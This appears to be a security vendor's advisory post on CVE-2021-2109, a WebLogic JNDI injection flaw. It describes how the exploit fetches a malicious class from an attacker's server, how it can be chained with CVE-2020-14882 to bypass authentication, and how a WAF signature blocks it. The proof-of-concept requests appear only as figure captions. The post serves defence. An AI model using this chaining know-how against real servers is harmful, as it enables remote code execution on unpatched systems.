Recently, a new critical update advisory was published by Oracle. One of the advisories is a fix for CVE-2021-2109 which affects WebLogic servers.
The vulnerability allows an authenticated user to abuse “JndiBinding" Handler and trigger a JNDI (Java Naming and Direction Interface) Lookup operation to fetch and deserialize a malicious class from an attacker’s controlled server. Deserialization of the malicious class could result in an arbitrary code execution on the WebLogic server.
A day after the patch was released, a POC was published by a researcher from Alibaba Cloud research group who originally reported this vulnerability to Oracle.
Usually, remote code execution vulnerabilities in WebLogic servers quickly capture the attention of threat actors who rapidly adopt them as part of their arsenal; integrating them into their operations.
The vulnerability can be exploited using a single HTTP Request:
Figure 1: Proof of concept HTTP request exploit for CVE-2021-2109
This vulnerability requires the attacker to be authenticated first. To overcome that, it could be combined with the directory traversal method used in the previously published remote code execution in WebLogic console (CVE-2020-14882) which allowed unauthenticated access, while proof of concepts are already available:
Figure 2: Proof of concept exploit combining CVE-2021-2109 and CVE-2020-14882
Mitigation with BIG-IP Аdvanced WAF (Attack Signatures and Threat Campaigns)
Advanced WAF customers under any supported version could be protected with the newly released attack signature 200104674 (Oracle WebLogic Console JNDI Injection) which could be found under Server-Side Code Injection attack type signatures.
Figure 3: Exploit attempt blocked by signature id 200104674
Customers with the Threat Campaigns license subscription could be also protected by newly released “Oracle WebLogic Console JndiBindingHandler RCE” Threat Campaign.